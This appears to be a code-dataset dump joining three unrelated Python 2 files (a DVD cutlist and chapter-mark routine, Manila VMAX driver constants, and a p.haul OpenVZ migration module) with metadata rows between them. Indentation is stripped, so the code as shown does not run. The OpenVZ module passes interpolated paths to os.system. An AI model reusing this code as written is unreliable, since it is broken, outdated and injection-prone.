CUT_TYPE_MARK = 2
CUT_TYPE_LAST = 3
accumulated_in = 0
accumulated_at = 0
last_in = 0
self.cutlist = [ ]
self.chaptermarks = [ ]
# our demuxer expects *strictly* IN,OUT lists.
currently_in = not any(type == CUT_TYPE_IN for pts, type in self.cuesheet)
if currently_in:
self.cutlist.append(0) # emulate "in" at first
for (pts, type) in self.cuesheet:
#print "pts=", pts, "type=", type, "accumulated_in=", accumulated_in, "accumulated_at=", accumulated_at, "last_in=", last_in
if type == CUT_TYPE_IN and not currently_in:
self.cutlist.append(pts)
last_in = pts
currently_in = True
if type == CUT_TYPE_OUT and currently_in:
self.cutlist.append(pts)
# accumulate the segment
accumulated_in += pts - last_in
accumulated_at = pts
currently_in = False
if type == CUT_TYPE_MARK and currently_in:
# relocate chaptermark against "in" time. This is not 100% accurate,
# as the in/out points are not.
reloc_pts = pts - last_in + accumulated_in
self.chaptermarks.append(reloc_pts)
if len(self.cutlist) > 1:
part = accumulated_in / (self.length*90000.0)
usedsize = int ( part * self.filesize )
self.estimatedDiskspace = usedsize
self.length = accumulated_in / 90000
def getChapterMarks(self, template="$h:$m:$s.$t"):
timestamps = [ ]
chapters = [ ]
minutes = self.properties.autochapter.getValue()
if len(self.chaptermarks) < 1 and minutes > 0:
chapterpts = 0
while chapterpts < (self.length-60*minutes)*90000:
chapterpts += 90000 * 60 * minutes
chapters.append(chapterpts)
else:
chapters = self.chaptermarks
for p in chapters:
timestring = template.replace("$h", str(p / (90000 * 3600)))
timestring = timestring.replace("$m", ("%02d" % (p % (90000 * 3600) / (90000 * 60))))
timestring = timestring.replace("$s", ("%02d" % (p % (90000 * 60) / 90000)))
timestring = timestring.replace("$t", ("%03d" % ((p % 90000) / 90)))
timestamps.append(timestring)
return timestamps
| gpl-2.0 | 1,176,808,851,013,645,800 | 36.52907 | 127 | 0.696514 | false | 3.119865 | true | false | false |
vponomaryov/manila | manila/share/drivers/dell_emc/plugins/vmax/constants.py | 1 | 1753 | # Copyright (c) 2016 Dell Inc. or its subsidiaries.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
STATUS_OK = 'ok'
STATUS_INFO = 'info'
STATUS_DEBUG = 'debug'
STATUS_WARNING = 'warning'
STATUS_ERROR = 'error'
STATUS_NOT_FOUND = 'not_found'
MSG_GENERAL_ERROR = '13690601492'
MSG_INVALID_VDM_ID = '14227341325'
MSG_INVALID_MOVER_ID = '14227341323'
MSG_FILESYSTEM_NOT_FOUND = "18522112101"
MSG_FILESYSTEM_EXIST = '13691191325'
MSG_VDM_EXIST = '13421840550'
MSG_SNAP_EXIST = '13690535947'
MSG_INTERFACE_NAME_EXIST = '13421840550'
MSG_INTERFACE_EXIST = '13691781136'
MSG_INTERFACE_INVALID_VLAN_ID = '13421850371'
MSG_INTERFACE_NON_EXISTENT = '13691781134'
MSG_JOIN_DOMAIN = '13157007726'
MSG_UNJOIN_DOMAIN = '13157007723'
# Necessary to retry when VMAX database is locked for provisioning operation
MSG_CODE_RETRY = '13421840537'
IP_ALLOCATIONS = 2
CONTENT_TYPE_URLENCODE = {'Content-Type': 'application/x-www-form-urlencoded'}
XML_HEADER = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
XML_NAMESPACE = 'http://www.emc.com/schemas/celerra/xml_api'
CIFS_ACL_FULLCONTROL = 'fullcontrol'
CIFS_ACL_READ = 'read'
SSH_DEFAULT_RETRY_PATTERN = r'Error 2201:.*: unable to acquire lock\(s\)'
| apache-2.0 | 1,427,866,968,296,748,000 | 30.872727 | 78 | 0.731888 | false | 2.976231 | false | false | false |
avagin/p.haul | p_haul_ovz.py | 1 | 4646 | #
# OpenVZ containers hauler module
#
import os
import shutil
import p_haul_cgroup
import p_haul_netifapi as netif
import p_haul_fsapi as fsapi
import p_haul_netapi as netapi
import fs_haul_shared
import fs_haul_subtree
name = "ovz"
vzpid_dir = "/var/lib/vzctl/vepid/"
vz_dir = "/vz"
vzpriv_dir = "%s/private" % vz_dir
vzroot_dir = "%s/root" % vz_dir
vz_conf_dir = "/etc/vz/conf/"
vz_pidfiles = "/var/lib/vzctl/vepid/"
cg_image_name = "ovzcg.img"
class p_haul_type:
def __init__(self, id):
self._ctid = id
#
# This list would contain (v_in, v_out, v_br) tuples where
# v_in is the name of veth device in CT
# v_out is its peer on the host
# v_bridge is the bridge to which thie veth is attached
#
self._veths = []
self._cfg = []
def __load_ct_config(self, dir):
print "Loading config file from %s" % dir
ifd = open(os.path.join(dir, self.__ct_config()))
for line in ifd:
self._cfg.append(line)
if line.startswith("NETIF="):
#
# Parse and keep veth pairs, later we will
# equip restore request with this data and
# will use it while (un)locking the network
#
v_in = None
v_out = None
v_bridge = None
vs = line.strip().split("=", 1)[1].strip("\"")
for parm in vs.split(","):
pa = parm.split("=")
if pa[0] == "ifname":
v_in = pa[1]
elif pa[0] == "host_ifname":
v_out = pa[1]
elif pa[0] == "bridge":
v_bridge = pa[1]
if v_in and v_out:
print "\tCollect %s -> %s (%s) veth" % (v_in, v_out, v_bridge)
veth = netapi.net_dev()
veth.name = v_in
veth.pair = v_out
veth.link = v_bridge
self._veths.append(veth)
ifd.close()
def __apply_cg_config(self):
print "Applying CT configs"
# FIXME -- implement
pass
def id(self):
return (name, self._ctid)
def init_src(self):
self._fs_mounted = True
self._bridged = True
self.__load_ct_config(vz_conf_dir)
def init_dst(self):
self._fs_mounted = False
self._bridged = False
def root_task_pid(self):
pf = open(os.path.join(vzpid_dir, self._ctid))
pid = pf.read()
return int(pid)
def __ct_priv(self):
return "%s/%s" % (vzpriv_dir, self._ctid)
def __ct_root(self):
return "%s/%s" % (vzroot_dir, self._ctid)
def __ct_config(self):
return "%s.conf" % self._ctid
#
# Meta-images for OVZ -- container config and info about CGroups
#
def get_meta_images(self, dir):
cg_img = os.path.join(dir, cg_image_name)
p_haul_cgroup.dump_hier(self.root_task_pid(), cg_img)
cfg_name = self.__ct_config()
return [ (os.path.join(vz_conf_dir, cfg_name), cfg_name), \
(cg_img, cg_image_name) ]
def put_meta_images(self, dir):
print "Putting config file into %s" % vz_conf_dir
self.__load_ct_config(dir)
ofd = open(os.path.join(vz_conf_dir, self.__ct_config()), "w")
ofd.writelines(self._cfg)
ofd.close()
# Keep this name, we'll need one in prepare_ct()
self.cg_img = os.path.join(dir, cg_image_name)
#
# Create cgroup hierarchy and put root task into it
# Hierarchy is unlimited, we will apply config limitations
# in ->restored->__apply_cg_config later
#
def prepare_ct(self, pid):
p_haul_cgroup.restore_hier(pid, self.cg_img)
def __umount_root(self):
print "Umounting CT root"
os.system("umount %s" % self.__ct_root())
self._fs_mounted = False
def mount(self):
nroot = self.__ct_root()
print "Mounting CT root to %s" % nroot
if not os.access(nroot, os.F_OK):
os.makedirs(nroot)
os.system("mount --bind %s %s" % (self.__ct_priv(), nroot))
self._fs_mounted = True
return nroot
def umount(self):
if self._fs_mounted:
self.__umount_root()
def get_fs(self):
rootfs = fsapi.path_to_fs(self.__ct_priv())
if not rootfs:
print "CT is on unknown FS"
return None
print "CT is on %s" % rootfs
if rootfs == "nfs":
return fs_haul_shared.p_haul_fs()
if rootfs == "ext3" or rootfs == "ext4":
return fs_haul_subtree.p_haul_fs(self.__ct_priv())
print "Unknown CT FS"
return None
def restored(self, pid):
print "Writing pidfile"
pidfile = open(os.path.join(vz_pidfiles, self._ctid), 'w')
pidfile.write("%d" % pid)
pidfile.close()
self.__apply_cg_config()
def net_lock(self):
for veth in self._veths:
netif.ifdown(veth[1])
def net_unlock(self):
for veth in self._veths:
netif.ifup(veth[1])
if veth[2] and not self._bridged:
netif.bridge_add(veth[1], veth[2])
def can_migrate_tcp(self):
return True
def veths(self):
#
# Caller wants to see list of tuples with [0] being name
# in CT and [1] being name on host. Just return existing
# tuples, the [2] with bridge name wouldn't hurt
#
return self._veths
| lgpl-2.1 | 7,124,431,274,139,254,000 | 23.197917 | 67 | 0.63022 | false | 2.556962 | true | false | false |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.